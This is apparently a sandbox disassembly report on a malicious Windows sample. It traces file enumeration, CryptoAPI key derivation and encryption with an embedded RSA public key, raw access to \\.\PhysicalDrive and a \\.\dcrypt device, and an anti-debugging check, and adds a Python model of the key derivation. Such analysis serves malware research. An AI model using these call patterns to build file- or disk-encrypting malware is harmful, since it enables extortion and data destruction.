                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DF1EF4
                                                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 00DF1EFE
                                                                      • LocalFree.KERNEL32(?), ref: 00DF1F18
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$ContextDestroy$Acquire$CloseCreateErrorEventFreeHandleHashLastLocalRelease
                                                                      • String ID:
                                                                      • API String ID: 1700672282-0
                                                                      • Opcode ID: aa24dda8736faacdee503d7e6b22aececc9cc47ac0c2e3a23e27803901595f54
                                                                      • Instruction ID: 7f5cf66cf0ab438377d929b5b92451d67153016fdf1c9f04358da9c7906e2044
                                                                      • Opcode Fuzzy Hash: aa24dda8736faacdee503d7e6b22aececc9cc47ac0c2e3a23e27803901595f54
                                                                      • Instruction Fuzzy Hash: F2219A39240709AFE720ABB69C85F6777ACAF48751F158418FB02E6580EB62E9448B74
                                                                      APIs
                                                                      • PathCombineW.SHLWAPI(?,?,00E05624), ref: 00DF1BBF
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00DF1BDA
                                                                      • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00DF1C07
                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 00DF1CB1
                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 00DF1CF2
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 00DF1D3F
                                                                      • FindClose.KERNEL32(00000000), ref: 00DF1D4E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                      • String ID: (V
                                                                      • API String ID: 1251538951-2915445117
                                                                      • Opcode ID: bad88251e8887346dab9b3f6586bbf8dc71f90d7f4ab97d2745e3fbbc5fe4299
                                                                      • Instruction ID: c0c854a108c1beca4fc0f71f88457280ea39d086adfee19874b07dc06129df02
                                                                      • Opcode Fuzzy Hash: bad88251e8887346dab9b3f6586bbf8dc71f90d7f4ab97d2745e3fbbc5fe4299
                                                                      • Instruction Fuzzy Hash: CB510075104209DAD720DF30CC45ABBB3B9EFA4754F4A8A28EA45D7094F732DA89CB71
                                                                      APIs
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF10A4
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF10B4
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF10D2
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,?), ref: 00DF10F8
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF1104
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 00DF1122
                                                                      • CryptImportPublicKeyInfo.CRYPT32(00000000,00000001,00000000,?), ref: 00DF1133
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF113D
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF1144
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                      • String ID:
                                                                      • API String ID: 3940947887-0
                                                                      • Opcode ID: 69d8e0144446c73edf8718845fbd822a1e6f8924a056e3f33caf6785c08183a5
                                                                      • Instruction ID: a33af31dcc540dc31bb94eb420d90772e836ba6bcbdfc8b18252ae23028ec5b0
                                                                      • Opcode Fuzzy Hash: 69d8e0144446c73edf8718845fbd822a1e6f8924a056e3f33caf6785c08183a5
                                                                      • Instruction Fuzzy Hash: DC216175A41319BBE7208B96DC85FEFBB7CEB45B51F104055FB04A6280DAB19E4487B0
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 00DF3A0A
                                                                      • _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF5E86: __FF_MSGBANNER.LIBCMT ref: 00DF5E9F
                                                                        • Part of subcall function 00DF5E86: __NMSG_WRITE.LIBCMT ref: 00DF5EA6
                                                                        • Part of subcall function 00DF5E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1), ref: 00DF5ECB
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                      • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00DF3A6F
                                                                      • _free.LIBCMT ref: 00DF3AD6
                                                                        • Part of subcall function 00DF5E4C: HeapFree.KERNEL32(00000000,00000000,?,00DFA0A7,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1), ref: 00DF5E62
                                                                        • Part of subcall function 00DF5E4C: GetLastError.KERNEL32(00000000,?,00DFA0A7,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1,?), ref: 00DF5E74
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocControlCreateDeviceErrorFileFreeLast__snwprintf_free_malloc
                                                                      • String ID: \\.\PhysicalDrive%d
                                                                      • API String ID: 2774441620-2935326385
                                                                      • Opcode ID: 75ed28a3b5864a878315fc4d03aae6750b96b12af14e916cb06edcc8301da12d
                                                                      • Instruction ID: ca3fd72fea371ae3f3b768bb873907466d3199f34ecb2f739ed7f294fcebc027
                                                                      • Opcode Fuzzy Hash: 75ed28a3b5864a878315fc4d03aae6750b96b12af14e916cb06edcc8301da12d
                                                                      • Instruction Fuzzy Hash: A0318671A41708AFD724DF65EC46FBA77B8EB48710F01819DF649A72C0DB70AA448BB1
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00DF15C0
                                                                      • GetLastError.KERNEL32 ref: 00DF15C6
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00DF15DD
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 00DF162C
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DF1638
                                                                      Strings
                                                                      • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00DF15EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$Acquire$DestroyErrorLastRelease
                                                                      • String ID: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                                                      • API String ID: 970883721-4244860603
                                                                      • Opcode ID: 403c590e98326b57fd2eabae9e966964cdb4f9594d2f7a1aa76fc0d3775c3ca1
                                                                      • Instruction ID: 42231c2cbd50d242cace5ebb1a3a9970d52ab6c21529f97bc7e2c1aa5e031603
                                                                      • Opcode Fuzzy Hash: 403c590e98326b57fd2eabae9e966964cdb4f9594d2f7a1aa76fc0d3775c3ca1
                                                                      • Instruction Fuzzy Hash: 2C11B175A0010DBBCB10DBA99C44EEEBBBCEF98740F198154FA05E7240DA319B498BB0
                                                                      APIs
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00DF101F
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF102D
                                                                      • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1040
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1054
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00DF1066
                                                                      • LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00DF1069
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CryptParam$Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 3966954206-0
                                                                      • Opcode ID: 28de026228d52fa45386b930d2c66d401b2d211da8018bee485d2fa71220d808
                                                                      • Instruction ID: cb35f2eeb6593e3d8e4da87ab4e6e4650a4ffe8cc79e7840f313a52b8ee6871a
                                                                      • Opcode Fuzzy Hash: 28de026228d52fa45386b930d2c66d401b2d211da8018bee485d2fa71220d808
                                                                      • Instruction Fuzzy Hash: 53012C71A41218BAE7209BA69C86FEEBB7CDB05B50F004055FB04A61C0DAB19E4486B5
                                                                      APIs
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000000), ref: 00DF1197
                                                                      • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00DF11A3
                                                                      • _memmove.LIBCMT ref: 00DF11BE
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,000000F0), ref: 00DF11DC
                                                                      • LocalFree.KERNEL32(?,?,000000F0), ref: 00DF11F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CryptEncryptLocal$AllocFree_memmove
                                                                      • String ID:
                                                                      • API String ID: 3579331289-0
                                                                      • Opcode ID: 4fd2f356f3ef7cbc467aaf9c0acede53ff7ca3a0e952996122e10b47e60934d0
                                                                      • Instruction ID: 12091e1c8ebc265327207831b0678a654cfba59107d55af55f0df44b4a6a4fe8
                                                                      • Opcode Fuzzy Hash: 4fd2f356f3ef7cbc467aaf9c0acede53ff7ca3a0e952996122e10b47e60934d0
                                                                      • Instruction Fuzzy Hash: E621B076641229AFD7208A99DC45FBBB7ACEB8A760F154255FE08D7240D6719D0087F0
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00DF681A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DF682F
                                                                      • UnhandledExceptionFilter.KERNEL32(00E03688), ref: 00DF683A
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00DF6856
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00DF685D
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 5ed183999f57e073fb3d2d8bb79528caedf563d772c083049356ae266b3eec62
                                                                      • Instruction ID: 9627dc5d97100f90a1928833cab2738dca36de612d089b04896f0d96da678e98
                                                                      • Opcode Fuzzy Hash: 5ed183999f57e073fb3d2d8bb79528caedf563d772c083049356ae266b3eec62
                                                                      • Instruction Fuzzy Hash: 8721BD744023049FD715EF6AFD846543BA4FB98310F90901EE948A6273E7B69AC8CF65
                                                                      APIs
                                                                      • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00DF1236
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00000001,00000000,?), ref: 00DF1249
                                                                      • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00DF125E
                                                                      • LocalFree.KERNEL32(00000000,?,?,00000001,00000000,?,?,?,?,00000001,00000000,?), ref: 00DF1276
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 4291131564-0
                                                                      • Opcode ID: fd3262839be3830d4f742966fd36390e00f431263211b34b20148a1cf84034df
                                                                      • Instruction ID: f5be4ec63b54257e1376a6e35ee3ecabee8fcba0b04164e0a09d8ce5dcf0d71e
                                                                      • Opcode Fuzzy Hash: fd3262839be3830d4f742966fd36390e00f431263211b34b20148a1cf84034df
                                                                      • Instruction Fuzzy Hash: 65015676702118BBD720CAAAAC45DFBB7ADDBC5761B0541ABFD08D7200DA728E0596F0
                                                                      APIs
                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00DF1D8D
                                                                      • CryptHashData.ADVAPI32(?,?,00000021,00000000), ref: 00DF1DA2
                                                                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?), ref: 00DF1DBC
                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 00DF1DC8
                                                                        • Part of subcall function 00DF1000: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00DF101F
                                                                        • Part of subcall function 00DF1000: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF102D
                                                                        • Part of subcall function 00DF1000: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1040
                                                                        • Part of subcall function 00DF1000: LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1054
                                                                        • Part of subcall function 00DF1000: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00DF1066
                                                                        • Part of subcall function 00DF1000: LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00DF1069
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                      • String ID:
                                                                      • API String ID: 797921460-0
                                                                      • Opcode ID: 859d05f86ab274faf8e99d976038559796221cea729582f2c0e0648cebaaa74c
                                                                      • Instruction ID: a0ea2c55d6883f4ed9bde3452936cb8eecbc73449c8f291e375c132ff1f650bb
                                                                      • Opcode Fuzzy Hash: 859d05f86ab274faf8e99d976038559796221cea729582f2c0e0648cebaaa74c
                                                                      • Instruction Fuzzy Hash: 60018036700208BBD620CBA7EC48E6BB7BDFB84B51B154159F609E3140DA72AE0487B0
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00DF12B7
                                                                      • GetLastError.KERNEL32 ref: 00DF12C1
                                                                      • CryptGenRandom.ADVAPI32(?,00000021), ref: 00DF12D5
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DF12E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                      • String ID:
                                                                      • API String ID: 2963463078-0
                                                                      • Opcode ID: d7f07ab5dae3555f52f0cbb2c7b6b8873f480f06a4844fc4dc72c6f70a2038af
                                                                      • Instruction ID: 15935f2388b025d9a9a49471bfdeb125acf42bcd62bd4d3477ef51d0684d4fc5
                                                                      • Opcode Fuzzy Hash: d7f07ab5dae3555f52f0cbb2c7b6b8873f480f06a4844fc4dc72c6f70a2038af
                                                                      • Instruction Fuzzy Hash: ED01F735601284BBE7348BBB9C49F6BBBFDABCD700F24414DF649E3151D5728A41D624
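The two records above describe one key-setup sequence: CryptAcquireContextW with provider type 0x18 (PROV_RSA_AES) and flag 0xF0000000 (CRYPT_VERIFYCONTEXT), CryptGenRandom for 0x21 = 33 bytes, then CryptCreateHash with ALG_ID 0x8003 (CALG_MD5), CryptHashData over those 33 bytes and CryptDeriveKey with ALG_ID 0x660E (CALG_AES_128) and flag 1 (CRYPT_EXPORTABLE). The Python below is an added model of that derivation, not code from the sample or from Joe Sandbox: the ALG_ID constants and lengths come from the trace, the 0x36/0x5C expansion step is Microsoft's documented CryptDeriveKey algorithm for 3DES/AES keys derived from a non-SHA-2 hash, and it generalises to AES-192/256 (key lengths the trace does not use). The cipher mode, padding and IV that subcall 00DF1000 sets through CryptSetKeyParam appear as "?" in the trace and are not modelled; the 33-byte input used below is constructed.

```python
"""Model of CryptDeriveKey(CALG_AES_*, hHash) for an MD5/SHA-1 base hash.

Reproduces the observable key-setup pipeline in the trace:
    CryptGenRandom(hProv, 0x21)      -> 33 random bytes ("password")
    CryptCreateHash(hProv, 0x8003)   -> MD5
    CryptHashData(hHash, pw, 0x21)
    CryptDeriveKey(hProv, 0x660E, hHash, 1) -> AES-128 key
The expansion step follows the CryptDeriveKey remarks in Microsoft's docs.
"""
import hashlib
import os

# ALG_ID values as they appear in the trace (wincrypt.h)
CALG_MD5 = 0x8003
CALG_SHA1 = 0x8004
CALG_AES_128 = 0x660E
CALG_AES_192 = 0x660F
CALG_AES_256 = 0x6610

HASH_NAME = {CALG_MD5: "md5", CALG_SHA1: "sha1"}
AES_KEY_LEN = {CALG_AES_128: 16, CALG_AES_192: 24, CALG_AES_256: 32}


def alg_id_fields(alg_id):
    """Split a wincrypt ALG_ID into its (class, type, sid) bit-fields."""
    return (alg_id & 0xE000, alg_id & 0x1E00, alg_id & 0x01FF)


def crypt_derive_key(base_data, hash_alg, key_alg):
    """CryptDeriveKey for AES from a non-SHA-2 hash, as documented by Microsoft:
    H = hash(base_data)
    key = (hash(H xor 0x36-pad64) || hash(H xor 0x5C-pad64))[:key_len]
    """
    name = HASH_NAME[hash_alg]
    n = AES_KEY_LEN[key_alg]
    h = hashlib.new(name, base_data).digest()
    # 64-byte buffers of 0x36 / 0x5C, first len(h) bytes XORed with the hash value
    ipad = bytes(b ^ 0x36 for b in h) + b"\x36" * (64 - len(h))
    opad = bytes(b ^ 0x5C for b in h) + b"\x5C" * (64 - len(h))
    expanded = hashlib.new(name, ipad).digest() + hashlib.new(name, opad).digest()
    return expanded[:n]


def derive_as_traced(password=None):
    """Exactly the parameters seen in the trace: 33 random bytes, MD5, AES-128.
    os.urandom stands in for CryptGenRandom(hProv, 0x21) when no input is given."""
    if password is None:
        password = os.urandom(0x21)
    if len(password) != 0x21:
        raise ValueError("trace hashes exactly 0x21 bytes")
    return crypt_derive_key(password, CALG_MD5, CALG_AES_128)


if __name__ == "__main__":
    sample_pw = bytes(range(0x21))  # constructed stand-in for the CryptGenRandom output
    print("ALG_ID 0x660E fields:", [hex(x) for x in alg_id_fields(CALG_AES_128)])
    print("AES-128 key:", derive_as_traced(sample_pw).hex())
```

Whatever the 33 random bytes are, the AES-128 key that reaches CryptEncrypt is a function of a single 16-byte MD5 value, so recovering the "password" is only useful if it is the value later exported or stored; the key itself is at most 128 bits of entropy.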
                                                                      APIs
                                                                      • CallNextHookEx.USER32(00030068,00000000,?,?), ref: 00DF404B
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CallControlCreateDeviceErrorFileHookLastNext
                                                                      • String ID:
                                                                      • API String ID: 508842537-0
                                                                      • Opcode ID: b6a2b6ebde296ccadede50102f370e752639a10103054d6067abf0a7adea8375
                                                                      • Instruction ID: 5343165419451497b158def3ea021c12875f99571257a5f158b4bdbb4050bd0b
                                                                      • Opcode Fuzzy Hash: b6a2b6ebde296ccadede50102f370e752639a10103054d6067abf0a7adea8375
                                                                      • Instruction Fuzzy Hash: 2811A370A0021C9FD710DFAAEC84ABFBBB4FB58310F15842DEA45A7251CA359984CBB1
                                                                      APIs
                                                                        • Part of subcall function 00DF61C0: __lock.LIBCMT ref: 00DF61CE
                                                                        • Part of subcall function 00DF61C0: __getch_nolock.LIBCMT ref: 00DF61D8
                                                                      • GetDesktopWindow.USER32 ref: 00DF49C3
                                                                      • GetForegroundWindow.USER32 ref: 00DF49CB
                                                                      • GetShellWindow.USER32 ref: 00DF49D7
                                                                      • GetCapture.USER32 ref: 00DF49E3
                                                                      • GetClipboardOwner.USER32 ref: 00DF49EF
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF49FB
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF4A07
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4A13
                                                                      • GetTickCount.KERNEL32 ref: 00DF4A1F
                                                                      • GetFocus.USER32 ref: 00DF4A2B
                                                                      • GetActiveWindow.USER32 ref: 00DF4A37
                                                                      • GetKBCodePage.USER32 ref: 00DF4A43
                                                                      • GetCursor.USER32 ref: 00DF4A4F
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4A62
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4A6E
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4A7F
                                                                      • GetInputState.USER32 ref: 00DF4A8B
